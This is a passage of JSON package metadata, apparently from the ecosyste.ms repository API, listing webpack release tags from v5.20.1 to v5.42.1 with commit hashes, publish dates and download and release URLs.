hed_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"